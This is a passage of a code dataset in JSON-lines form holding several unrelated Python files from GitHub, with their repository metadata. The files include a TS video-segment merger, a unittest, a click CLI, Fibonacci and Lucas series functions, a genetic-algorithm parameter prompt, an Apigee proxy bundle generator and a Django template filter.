'''\r\n 合并ts文件\r\n :param output_file: 合并后的文件名\r\n :param ts_files: 需要合并的TS文件列表\r\n :param save_path: 文件路径\r\n :return:\r\n '''\r\n with open(save_path + output_file, 'wb') as outfile:\r\n for ts_file in ts_files:\r\n with open(save_path + ts_file, 'rb') as infile:\r\n outfile.write(infile.read())\r\n\r\n\r\nif __name__ == '__main__':\r\n save_path = 'D:/pythonProject/爬虫/movie/锦衣之下(7)/'\r\n\r\n ts_files = get_sorted_filenames(save_path) # 需要合并的TS文件列表\r\n print(ts_files)\r\n\r\n output_file = save_path.split('/')[-2]+'.mp4' # 合并后的TS文件名\r\n print(output_file)\r\n\r\n merge_ts_files(output_file, ts_files, save_path)\r\n","repo_name":"JerryYangJ/MyFirstProject","sub_path":"爬虫/movies_m3u8_ts_marge.py","file_name":"movies_m3u8_ts_marge.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34253042655","text":"import unittest\n\nfrom force_wfmanager.notifications.ui_notification_hooks_manager \\\n import \\\n UINotificationHooksManager\nfrom force_wfmanager.notifications.ui_notification_plugin import \\\n UINotificationPlugin\n\n\nclass TestUINotificationHooksFactory(unittest.TestCase):\n def setUp(self):\n self.plugin = UINotificationPlugin()\n self.factory = self.plugin.ui_hooks_factories[0]\n\n def test_initialization(self):\n self.assertEqual(self.factory.plugin_id, self.plugin.id)\n self.assertEqual(self.factory.plugin_name, self.plugin.name)\n\n def test_create_ui_hooks_manager(self):\n self.assertIsInstance(\n self.factory.create_ui_hooks_manager(),\n UINotificationHooksManager)\n","repo_name":"force-h2020/force-wfmanager","sub_path":"force_wfmanager/notifications/tests/test_ui_notification_hooks_factory.py","file_name":"test_ui_notification_hooks_factory.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37095191911","text":"import sys\nimport click\nfrom rixtribute.commands.ec2 import ec2 as ec2_commands\nfrom rixtribute.commands.ecr import ecr as ecr_commands\nfrom rixtribute.commands.container import container as container_commands\nfrom rixtribute.commands.init import init as init_commands\nfrom rixtribute.commands.run import run as run_commands\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\n@click.group(invoke_without_command=True, context_settings=CONTEXT_SETTINGS)\n@click.pass_context\n@click.option('--verbose', '-v', is_flag=True, help=\"Increase output verbosity\")\ndef main(ctx, verbose):\n group_commands = main.list_commands(ctx)\n\n if ctx.invoked_subcommand is None:\n # No command supplied\n # Inform user on the available commands when running the app\n\n click.echo(\"Specify one of the commands below:\")\n click.echo(\"----------------------------------\")\n print(*group_commands, sep='\\n')\n\n ctx.obj = {\n 'VERBOSE': verbose\n }\n\n\n\n## Add command groups\nmain.add_command(ec2_commands)\nmain.add_command(ecr_commands)\nmain.add_command(container_commands)\nmain.add_command(init_commands)\nmain.add_command(run_commands)\n","repo_name":"jesperrix/rixtribute","sub_path":"rixtribute/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"34856520107","text":"def fib(n):\n\n if n <= 1:\n return n \n else:\n return(fib(n-1) + fib(n-2))\n\n\ndef lucas(n):\n\n if n == 0:\n return 2\n\n elif n == 1:\n return 1\n \n elif n == 2:\n return 3\n \n else:\n return(lucas(n-1) + lucas(n-2))\n\n\ndef sum_series(x,y=0,z=1):\n\n if x == 0:\n return y\n if x == 1:\n return z \n else:\n return(sum_series(x-1, y, z) + sum_series(x-2, y, z))\n \n\n","repo_name":"everydaytimmy/math-series","sub_path":"math_series/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23100582485","text":"from algorithms.binary import BinaryGA\r\nfrom algorithms.floating import FloatGA\r\nfrom run import run as run_genetic\r\nfrom functions import *\r\n\r\nimport numpy as np\r\n \r\n\r\nPARAMETERS = {\r\n 'p': 'Population size',\r\n 'd': 'Result display [binary, float]',\r\n 'e': 'Precision (decimals count)',\r\n 'm': 'Mutation probability',\r\n 'c': 'Maximum function evaluations allowed',\r\n 'r': 'Upper and lower boundaries',\r\n 'v': 'Number of variables',\r\n 'f': 'Function used (f1, f3, f6, f7)',\r\n 't': 'Tournament size',\r\n}\r\n\r\nVALUES = {\r\n 'p': 150,\r\n 'd': 'float',\r\n 'r': [-50, 150],\r\n 'e': 5,\r\n 'm': 0.1,\r\n 'c': 20000,\r\n 'v': 2,\r\n 'f': 'f1',\r\n 't': 3,\r\n}\r\n\r\nTYPES = {\r\n 'int': 'pevtc',\r\n 'float': 'm',\r\n 'str': 'df',\r\n 'rng': 'r'\r\n}\r\n\r\nFUNCTIONS = {\r\n 'f1': function_1,\r\n 'f3': function_3,\r\n 'f6': function_6,\r\n 'f7': function_7,\r\n}\r\n\r\nchange = input(\"Want to change some parameters? [y/n]: \") in 'yes|Yes'\r\nif change:\r\n print(\"Parameter keys:\")\r\n for p in PARAMETERS:\r\n print(\"\\t\" + p + ' - ' + PARAMETERS[p] + ' (' + str(VALUES[p]) + ')')\r\n print(\"\\ta - All parameters\")\r\n parameters = input(\"List the parameter keys you wish to input: \")\r\n if parameters == 'a':\r\n parameters = 'pdmeftrv'\r\n for p in parameters:\r\n if p == 'a':\r\n print(\"Sorry, 'a' does not go with others!\")\r\n value = input('\\t' + PARAMETERS[p] + \" value: \")\r\n if p in TYPES['int']:\r\n VALUES[p] = int(value)\r\n elif p in TYPES['float']:\r\n VALUES[p] = float(value)\r\n elif p in TYPES['str']:\r\n VALUES[p] = value\r\n elif p in TYPES['rng']:\r\n value = value.split(' ')\r\n VALUES[p] = [int(v) for v in value]\r\n \r\nprint(\"All right! The values used will be:\")\r\nfor p in VALUES:\r\n print(\"\\t\" + PARAMETERS[p] + \":\", VALUES[p])\r\n\r\nalgorithm = BinaryGA if VALUES['d'] == 'binary' else FloatGA\r\n\r\nrun_genetic(VALUES, algorithm, FUNCTIONS[VALUES['f']])","repo_name":"amalija-ramljak/apr_lab","sub_path":"lab 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28560462040","text":"from xml.etree.ElementTree import Element, SubElement, tostring\nfrom module_utils.swagger_converter import _swagger_to_xml\nfrom module_utils.quota import Quota\nfrom module_utils.spike_arrest import SpikeArrest\nfrom module_utils.key_value_map_operations import KeyValueMapOperations\nfrom module_utils.authentication import Authentication\nfrom module_utils.fault_rule import FaultRule\nfrom module_utils.assign_message import AssignMessage\nfrom module_utils.raise_fault import RaiseFault\nfrom module_utils.cors import Cors\n\n\nclass ApiProxyBundle:\n def __init__(self, proxy_name, team_name, description, base_path, api_proxy_base_path):\n self._authentication_policy = Authentication()\n self._swagger_xml = ''\n self._description = description\n self.policies = []\n self._pre_flow_policies = []\n self._pre_flow_response_policies = []\n self._target_endpoint_policies = []\n self._fault_rules = []\n self._base_path = base_path\n self._api_proxy_base_path = api_proxy_base_path\n self._api_name = proxy_name\n self._api_team = team_name\n self._name = self.set_saas_prefix(\"SaaS\")\n self._target_connection_element = self._define_saas_target_element()\n\n def __str__(self):\n return \"Proxy Bundle Generator Class\"\n\n def api_name(self):\n return self._name\n\n def import_swagger(self, swagger_json):\n self._swagger_xml = _swagger_to_xml(swagger_json)\n\n def skip_authorization(self, methods):\n self._authentication_policy.ignore_this_methods(methods)\n\n @staticmethod\n def _xml_document_to_string(document):\n return tostring(document, encoding='utf8', method='xml').decode()\n\n def add_authentication(self):\n environment_values = KeyValueMapOperations(self._name)\n self.policies.append(environment_values)\n self._add_policy_pre_flow(environment_values)\n authentication = Authentication()\n self._authentication_policy = authentication\n self._add_policy_pre_flow(authentication)\n\n def add_quota_trial(self):\n quota = Quota('QuotaTrial', 1, 'month', 10000)\n self._add_policy_pre_flow(quota)\n fault_rule = self._new_fault_rule('RiseMessageTrialQuotaExceeded', 'ratelimit.QuotaTrial.failed = true')\n\n message = AssignMessage('TrialQuotaExceeded')\n message.return_json({\n \"error\": \"429\",\n \"description\": \"Quota Exceeded, please contact the Api Management Team\"\n })\n message.add_condition('fault.name Matches \"QuotaViolation\"')\n self.policies.append(message)\n fault_rule.add_policy(message)\n\n def add_quota(self, interval, time_unit, count):\n quota = Quota('Quota', interval, time_unit, count)\n self._add_policy_pre_flow(quota)\n\n def _new_fault_rule(self, name, condition):\n fault_rule = FaultRule(name, condition)\n self._fault_rules.append(fault_rule)\n return fault_rule\n\n def add_spike_arrest(self, spike_arrest_value, unit):\n spike_arrest = SpikeArrest(spike_arrest_value, unit)\n self._add_policy_pre_flow(spike_arrest)\n\n def add_cors(self, allow_origin, allow_headers):\n for policy in self.policies:\n policy.skip_verb_options()\n\n cors_policy = Cors(allow_origin, allow_headers)\n\n flow = SubElement(self._swagger_xml, 'Flow')\n flow.set(\"name\", \"CORS preflight\")\n cors_policy.add_cors_step_xml(flow)\n\n self._add_policy_pre_flow_response(cors_policy)\n\n fault_rule = self._new_fault_rule('cors-fault-rule', '(response.status.code != \"200\")')\n fault_rule.add_policy(cors_policy)\n\n def _add_policy_pre_flow_response(self, policy):\n self.policies.append(policy)\n self._pre_flow_response_policies.append(policy)\n\n def _add_policy_pre_flow(self, policy):\n self.policies.append(policy)\n self._pre_flow_policies.append(policy)\n\n def _add_target_endpoint_policy(self, policy):\n self.policies.append(policy)\n self._target_endpoint_policies.append(policy)\n\n def add_proxy_health(self, web_method_name, api_proxy_tag):\n fault_policy = RaiseFault(\"ProxyHealth\")\n fault_policy.fault_response(\n 200,\n \"Proxy OK!\",\n {\"proxy-status\": \"running\", \"environment\": \"{environment.name}\", \"Proxy Version\": api_proxy_tag})\n fault_policy.add_condition('proxy.pathsuffix MatchesPath \"/{}\"'.format(web_method_name))\n self._add_policy_pre_flow(fault_policy)\n\n def targets_default_xml(self):\n target_endpoint = Element('TargetEndpoint')\n target_endpoint.set('name', 'default')\n\n SubElement(target_endpoint, 'Description')\n target_fault_rules = SubElement(target_endpoint, 'FaultRules')\n for p in self._pre_flow_response_policies:\n if p._name == \"add-cors\":\n fault_rule = self._new_fault_rule('cors-fault-rule', '(response.status.code != \"200\")')\n fault_rule.add_policy(p)\n fault_rule.add_to_parent_node(target_fault_rules)\n\n pre_flow = SubElement(target_endpoint, 'PreFlow')\n pre_flow.set('name', 'PreFlow')\n pre_flow_request = SubElement(pre_flow, 'Request')\n for p in self._target_endpoint_policies:\n p.add_step_xml(pre_flow_request)\n SubElement(pre_flow, 'Response')\n\n SubElement(target_endpoint, 'Flows')\n\n post_flow = SubElement(target_endpoint, 'PostFlow')\n post_flow.set('name', 'PostFlow')\n post_flow_request = SubElement(post_flow, 'Request')\n for p in self._target_endpoint_policies:\n p.add_step_xml(post_flow_request)\n SubElement(post_flow, 'Response')\n\n target_endpoint.append(self._target_connection_element)\n\n for p in self._target_endpoint_policies:\n default_rule = SubElement(target_endpoint, 'DefaultFaultRule')\n default_rule.set('name', 'default_rule')\n always_enforce = SubElement(default_rule, 'AlwaysEnforce')\n always_enforce.text = 'true'\n p.add_step_xml(default_rule)\n\n return self._xml_document_to_string(target_endpoint)\n\n def _define_saas_target_element(self):\n http_target_connection = Element('HTTPTargetConnection')\n server_element = SubElement(http_target_connection, 'LoadBalancer')\n server = SubElement(server_element, 'Server')\n server.set('name', self._name)\n path = SubElement(http_target_connection, 'Path')\n path.text = self._base_path\n return http_target_connection\n\n def define_url_in_target(self, api_url, api_base_path):\n http_target_connection = Element('HTTPTargetConnection')\n url = SubElement(http_target_connection, 'URL')\n url.text = api_url + api_base_path\n self._target_connection_element = http_target_connection\n\n def manifests_manifest_xml(self):\n manifest = Element('Manifest')\n manifest.set('name', 'manifest')\n\n policies = SubElement(manifest, 'Policies')\n for policy in self.policies:\n policy_xml_node = SubElement(policies, 'VersionInfo')\n policy_xml_node.set('resourceName', policy.name())\n\n proxy_endpoints = SubElement(manifest, 'ProxyEndpoints')\n version_info = SubElement(proxy_endpoints, 'VersionInfo')\n version_info.set('resourceName', 'default')\n\n target_endpoints = SubElement(manifest, 'TargetEndpoints')\n version_info = SubElement(target_endpoints, 'VersionInfo')\n version_info.set('resourceName', 'default')\n\n return self._xml_document_to_string(manifest)\n\n def proxies_default_xml(self):\n proxy_endpoint = Element('ProxyEndpoint')\n proxy_endpoint.set('name', 'default')\n\n SubElement(proxy_endpoint, 'Description')\n\n pre_flow = SubElement(proxy_endpoint, 'PreFlow')\n pre_flow.set('name', 'PreFlow')\n request = SubElement(pre_flow, 'Request')\n\n for p in self._pre_flow_policies:\n p.add_step_xml(request)\n\n response = SubElement(pre_flow, 'Response')\n for p in self._pre_flow_response_policies:\n p.add_step_xml(response)\n\n post_flow = SubElement(proxy_endpoint, 'PostFlow')\n SubElement(post_flow, 'Request')\n SubElement(post_flow, 'Response')\n\n fault_rules_xml = SubElement(proxy_endpoint, 'FaultRules')\n for f in self._fault_rules:\n f.add_to_parent_node(fault_rules_xml)\n\n if self._swagger_xml:\n proxy_endpoint.append(self._swagger_xml)\n else:\n SubElement(proxy_endpoint, 'Flows')\n\n http_proxy_connection = SubElement(proxy_endpoint, 'HTTPProxyConnection')\n base_path = SubElement(http_proxy_connection, 'BasePath')\n base_path.text = '/{}/{}{}'.format(self._api_team, self._api_name, self._api_proxy_base_path)\n SubElement(http_proxy_connection, 'Properties')\n virtual_host = SubElement(http_proxy_connection, 'VirtualHost')\n virtual_host.text = 'ey'\n\n for p in self._pre_flow_response_policies:\n if p._name == \"add-cors\":\n route_rule = SubElement(proxy_endpoint, 'RouteRule')\n route_rule.set('name', 'NoRoute')\n target_endpoint = SubElement(route_rule, 'Condition')\n target_endpoint.text = 'request.verb == \"OPTIONS\" AND '\\\n 'request.header.origin != null AND ' \\\n 'request.header.Access-Control-Request-Method != null'\n\n route_rule = SubElement(proxy_endpoint, 'RouteRule')\n route_rule.set('name', 'default')\n target_endpoint = SubElement(route_rule, 'TargetEndpoint')\n target_endpoint.text = 'default'\n\n return self._xml_document_to_string(proxy_endpoint)\n\n def main_xml_filename(self):\n return self._name + \".xml\"\n\n def main_xml(self):\n api_proxy = Element('APIProxy')\n api_proxy.set('name', self._name)\n\n base_paths = SubElement(api_proxy, 'BasePaths')\n base_paths.text = '/{}/{}{}'.format(self._api_team, self._api_name, self._api_proxy_base_path)\n\n configuration_version = SubElement(api_proxy, 'ConfigurationVersion')\n configuration_version.set('majorVersion', '4')\n configuration_version.set('minorVersion', '0')\n\n description = SubElement(api_proxy, 'Description')\n description.text = self._description\n\n display_name = SubElement(api_proxy, 'DisplayName')\n display_name.text = self._name\n\n policies = SubElement(api_proxy, 'Policies')\n for policy in self.policies:\n policy_xml_node = SubElement(policies, 'Policy')\n policy_xml_node.text = policy.name()\n\n proxy_endpoints = SubElement(api_proxy, 'ProxyEndpoints')\n proxy_endpoint = SubElement(proxy_endpoints, 'ProxyEndpoint')\n proxy_endpoint.text = \"default\"\n\n resources = SubElement(api_proxy, 'Resources')\n resource = SubElement(resources, 'Resource')\n resource.text = \"openapi://association.json\"\n\n target_endpoints = SubElement(api_proxy, 'TargetEndpoints')\n target_endpoint = SubElement(target_endpoints, 'TargetEndpoint')\n target_endpoint.text = \"default\"\n\n return self._xml_document_to_string(api_proxy)\n\n def set_microgateway_prefix(self, prefix):\n self._name = prefix + \"_\" + self._name\n\n def set_saas_prefix(self, prefix):\n return prefix + \"_\" + self._api_team + \"_\" + self._api_name\n","repo_name":"lalvar1/xml_builder","sub_path":"module_utils/api_proxy_bundle.py","file_name":"api_proxy_bundle.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24896144130","text":"from employee.models import StudentStudyRecord\n\nfrom django.utils.safestring import mark_safe\n\nfrom django.template import Library\n\nregister=Library()\n\n\n@register.filter\ndef select_default(val):\n choices_list = StudentStudyRecord.record_choices\n html = ''\n for i in choices_list:\n if val == i[0]:\n html+=''%(i[0],i[1])\n else:\n html+='' % (i[0], i[1])\n\n return mark_safe(html)\n","repo_name":"429572064/CRM","sub_path":"employee/templatetags/select_default.py","file_name":"select_default.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}